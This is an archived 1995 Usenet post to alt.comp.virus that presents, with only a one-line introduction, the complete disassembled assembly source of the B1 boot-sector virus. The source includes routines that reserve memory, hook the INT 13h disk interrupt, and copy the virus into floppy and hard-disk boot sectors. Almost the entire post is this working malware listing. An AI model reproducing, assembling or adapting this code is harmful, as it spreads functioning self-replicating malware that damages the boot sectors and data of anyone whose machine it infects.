home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / b / b1.asm / partbinary0 < prev   
Encoding:
Text File  |  1998-01-14  |  10.8 KB  |  350 lines
  1.  
  2. Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!news.sprintlink.net!uunet!ankh.iia.org!danishm
  3. From: danishm@iia.org ()
  4. Newsgroups: alt.comp.virus
  5. Subject: B1
  6. Date: 5 Feb 1995 22:05:37 GMT
  7. Organization: International Internet Association.
  8. Lines: 330
  9. Message-ID: <3h3i3h$v4@ankh.iia.org>
  10. NNTP-Posting-Host: iia.org
  11. X-Newsreader: TIN [version 1.2 PL2]
  12.  
  13. Here is the B1 virus:
  14.  
  15.   
  16. PAGE  59,132
  17. ; Disassembled using sourcer  
  18. ;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  19. ;[[                                                                      [[
  20. ;[[                             B1                                       [[
  21. ;[[                                                                      [[
  22. ;[[      Created:   8-Jan-95                                             [[
  23. ;[[      Version:                                                        [[
  24. ;[[      Code type: zero start                                           [[
  25. ;[[      Passes:    5          Analysis Options on: none                 [[
  26. ;[[                                                                      [[
  27. ;[[                                                                      [[
  28. ;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  29.   
  30. data_1e         equ     413h                    ; (0000:0413=7Fh)
  31. data_2e         equ     46Dh                    ; (0000:046D=17E1h)
  32. data_3e         equ     4Ch                     ; (0006:004C=0DAh)
  33.   
  34. seg_a           segment byte public
  35.         assume  cs:seg_a, ds:seg_a
  36.   
  37.   
  38.         org     0
  39.   
  40. virus           proc    far
  41.   
  42. start:
  43.         jmp     short loc_2             ; (0040)
  44.         db       90h, 00h, 4Dh, 4Dh, 49h, 00h
  45.         db       33h, 2Eh, 33h, 00h, 02h, 01h
  46.         db       01h, 00h, 02h,0E0h, 00h, 40h
  47.         db       0Bh,0F0h, 09h, 00h, 12h, 00h
  48.         db       02h, 00h
  49.         db      19 dup (0)
  50.         db       12h, 00h, 00h, 00h, 00h, 01h
  51.         db       00h,0FAh, 33h,0C0h, 8Eh,0D0h
  52.         db      0BCh, 00h, 7Ch, 16h, 07h
  53. loc_2:
  54.         push    cs
  55.         call    sub_1                   ; (00EF)
  56.         push    ax
  57.         shr     ax,1                    ; Shift w/zeros fill
  58.         dec     ah
  59.         jz      loc_3                   ; Jump if zero
  60.         jmp     loc_14                  ; (01BA)
  61. loc_3:
  62.         push    bx
  63.         push    cx
  64.         push    dx
  65.         push    es
  66.         push    si
  67.         push    di
  68.         push    ds
  69.         push    bp
  70.         mov     bp,sp
  71.         or      ch,ch                   ; Zero ?
  72.         jnz     loc_5                   ; Jump if not zero
  73.         shl     al,1                    ; Shift w/zeros fill
  74.         jc      loc_4                   ; Jump if carry Set
  75.         call    sub_6                   ; (0190)
  76.         call    sub_4                   ; (017B)
  77.         jc      loc_7                   ; Jump if carry Set
  78.         call    sub_2                   ; (0127)
  79.         jz      loc_4                   ; Jump if zero
  80.         call    sub_6                   ; (0190)
  81.         call    sub_3                   ; (013B)
  82.         jz      loc_5                   ; Jump if zero
  83.         inc     ah
  84.         call    sub_4                   ; (017B)
  85.         jc      loc_5                   ; Jump if carry Set
  86.         call    sub_5                   ; (0182)
  87.         call    sub_6                   ; (0190)
  88.         inc     ah
  89.         call    sub_4                   ; (017B)
  90. loc_4:
  91.         call    sub_7                   ; (019E)
  92.         or      ch,dh
  93.         dec     cx
  94.         jnz     loc_5                   ; Jump if not zero
  95.         call    sub_6                   ; (0190)
  96.         call    sub_4                   ; (017B)
  97.         jc      loc_7                   ; Jump if carry Set
  98.         call    sub_2                   ; (0127)
  99.         jnz     loc_5                   ; Jump if not zero
  100.         call    sub_7                   ; (019E)
  101.         call    sub_3                   ; (013B)
  102.         dec     byte ptr [bp+10h]
  103.         jz      loc_6                   ; Jump if zero
  104.         mov     al,1
  105.         call    sub_4                   ; (017B)
  106.         jc      loc_7                   ; Jump if carry Set
  107.         call    sub_7                   ; (019E)
  108.         add     bx,di
  109.         inc     cl
  110.         jmp     short loc_6             ; (00BA)
  111. loc_5:
  112.         call    sub_7                   ; (019E)
  113. loc_6:
  114.         call    sub_4                   ; (017B)
  115. loc_7:
  116.         pushf                           ; Push flags
  117.         pop     bx
  118.         mov     [bp+16h],bx
  119.         xchg    ax,[bp+10h]
  120.         shr     ah,1                    ; Shift w/zeros fill
  121.         jnc     loc_9                   ; Jump if carry=0
  122.         xor     ax,ax                   ; Zero register
  123.         mov     ds,ax
  124.         mov     ax,ds:data_2e           ; (0000:046D=17E1h)
  125.         and     ax,178Fh
  126.         jnz     loc_9                   ; Jump if not zero
  127.         call    sub_6                   ; (0190)
  128. loc_8:
  129.         push    ax
  130.         call    sub_4                   ; (017B)
  131.         xor     cx,0FFC0h
  132.         nop                             ;*ASM fixup - sign extn byte
  133.         shl     ax,1                    ; Shift w/zeros fill
  134.         pop     ax
  135.         jnc     loc_8                   ; Jump if carry=0
  136. loc_9:
  137.         pop     bp
  138.         pop     ds
  139.         pop     di
  140.         pop     si
  141.         pop     es
  142.         pop     dx
  143.         pop     cx
  144.         pop     bx
  145.         pop     ax
  146.         iret                            ; Interrupt return
  147.   
  148. virus           endp
  149.   
  150. ;__________________________________________________________________________
  151. ;                              SUBROUTINE
  152. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  153.   
  154. sub_1           proc    near
  155.         mov     bx,44h
  156.         mov     dx,80h
  157.         mov     si,data_1e              ; (0000:0413=7Fh)
  158.         xor     di,di                   ; Zero register
  159.         mov     ds,di
  160.         dec     word ptr [si]
  161.         lodsw                           ; String [si] to ax
  162.         pop     si
  163.         mov     cl,6
  164.         shl     ax,cl                   ; Shift w/zeros fill
  165.         mov     es,ax
  166.         sub     si,bx
  167.         push    si
  168.         push    ax
  169.         mov     ax,1AEh
  170.         push    ax
  171.         push    cs
  172.         push    si
  173.         push    cs
  174.         pop     ds
  175.         call    sub_5                   ; (0182)
  176.         mov     ds,cx
  177.         mov     si,data_3e              ; (0006:004C=0DAh)
  178.         mov     cl,2
  179.         rep     movsw                   ; Rep when cx >0 Mov [si] to es:[di]
  180.         mov     [si-4],bx
  181.         mov     [si-2],es
  182.         pop     bx
  183.         pop     es
  184.         retf                            ; Return far
  185. sub_1           endp
  186.   
  187.   
  188. ;__________________________________________________________________________
  189. ;                              SUBROUTINE
  190. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  191.   
  192. sub_2           proc    near
  193.         cld                             ; Clear direction
  194.         push    cs
  195.         pop     ds
  196.         xor     si,si                   ; Zero register
  197.         mov     di,bx
  198.         mov     cl,40h                  ; '@'
  199.         push    si
  200.         push    di
  201.         add     si,cx
  202.         add     di,cx
  203.         repe    cmpsb                   ; Rep zf=1+cx >0 Cmp [si] to es:[di]
  204.         pop     di
  205.         pop     si
  206.         retn
  207. sub_2           endp
  208.   
  209.   
  210. ;__________________________________________________________________________
  211. ;                              SUBROUTINE
  212. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  213.   
  214. sub_3           proc    near
  215.         push    ax
  216.         xor     dh,dh                   ; Zero register
  217.         test    dl,80h
  218.         jz      loc_10                  ; Jump if zero
  219.         mov     cx,11h
  220.         jmp     short loc_11            ; (0175)
  221. loc_10:
  222.         mov     ax,[di+11h]
  223.         mov     cl,4
  224.         shr     ax,cl                   ; Shift w/zeros fill
  225.         mov     cx,ax
  226.         mov     ax,[di+16h]
  227.         shl     ax,1                    ; Shift w/zeros fill
  228.         jc      loc_12                  ; Jump if carry Set
  229.         add     ax,cx
  230.         jc      loc_12                  ; Jump if carry Set
  231.         xor     cx,cx                   ; Zero register
  232.         cmp     ah,[di+18h]
  233.         jae     loc_12                  ; Jump if above or =
  234.         div     byte ptr [di+18h]       ; al,ah rem = ax/data
  235.         xchg    cl,ah
  236.         cmp     ah,[di+1Ah]
  237.         jae     loc_12                  ; Jump if above or =
  238.         div     byte ptr [di+1Ah]       ; al,ah rem = ax/data
  239.         mov     ch,al
  240.         mov     dh,ah
  241.         inc     cx
  242. loc_11:
  243.         pop     ax
  244.         retn
  245. loc_12:
  246.         xor     cx,cx                   ; Zero register
  247.         jmp     short loc_11            ; (0175)
  248. sub_3           endp
  249.   
  250.   
  251. ;__________________________________________________________________________
  252. ;                              SUBROUTINE
  253. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  254.   
  255. sub_4           proc    near
  256.         pushf                           ; Push flags
  257.         call    dword ptr cs:[1BCh]     ; (7379:01BC=0D79h)
  258.         retn
  259. sub_4           endp
  260.   
  261.   
  262. ;__________________________________________________________________________
  263. ;                              SUBROUTINE
  264. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  265.   
  266. sub_5           proc    near
  267.         cld                             ; Clear direction
  268.         movsw                           ; Mov [si] to es:[di]
  269.         mov     cx,17Ch
  270.         add     si,3Eh
  271.         add     di,3Eh
  272.         rep     movsb                   ; Rep when cx >0 Mov [si] to es:[di]
  273.         retn
  274. sub_5           endp
  275.   
  276.   
  277. ;__________________________________________________________________________
  278. ;                              SUBROUTINE
  279. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  280.   
  281. sub_6           proc    near
  282.         push    cs
  283.         mov     ax,200h
  284.         mov     bx,ax
  285.         xor     cx,cx                   ; Zero register
  286.         xor     dh,dh                   ; Zero register
  287.         inc     cx
  288.         inc     ax
  289.         pop     es
  290.         retn
  291. sub_6           endp
  292.   
  293.   
  294. ;__________________________________________________________________________
  295. ;                              SUBROUTINE
  296. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  297.   
  298. sub_7           proc    near
  299.         mov     ax,[bp+10h]
  300.         mov     bx,[bp+0Eh]
  301.         mov     cx,[bp+0Ch]
  302.         mov     dx,[bp+0Ah]
  303.         mov     es,[bp+8]
  304.         retn
  305. sub_7           endp
  306.   
  307.         db      41h                     ; Inc   cx   ?
  308. loc_13:
  309.         mov     ax,201h
  310.         int     13h                     ; Disk  dl=drive a  ah=func 02h
  311.                         ;  read sectors to memory es:bx
  312.         xor     dl,80h
  313.         jz      loc_13                  ; Jump if zero
  314.         retf                            ; Return far
  315. loc_14:
  316.         pop     ax
  317. ;*              jmp     far ptr loc_1           ;*(000A:0D79)
  318.         db      0EAh, 79h, 0Dh, 0Ah, 00h
  319.         db      0Dh, 0Ah, 'Disk Boot failure', 0Dh
  320.         db      0Ah, 0
  321.         db      'IBMBIO  COMIBMDOS  COM'
  322.         db      18 dup (0)
  323.         db       55h,0AAh
  324.   
  325. seg_a           ends
  326.   
  327.   
  328.   
  329.         end     start
  330.  
  331. ls virus.asm
  332.  
  333.  
  334.  
  335. ls virus.asm
  336.  
  337.  
  338.  
  339.  
  340.  
  341.  
  342.  
  343.  
  344. --
  345. Eric "Mad Dog" Kilby                                 maddog@ccs.neu.edu
  346. The Great Sporkeus Maximus                 ekilby@lynx.dac.neu.edu
  347. Student at the Northeatstern University College of Computer Science 
  348. "I Can't Believe It's Not Butter"
  349.  
  350.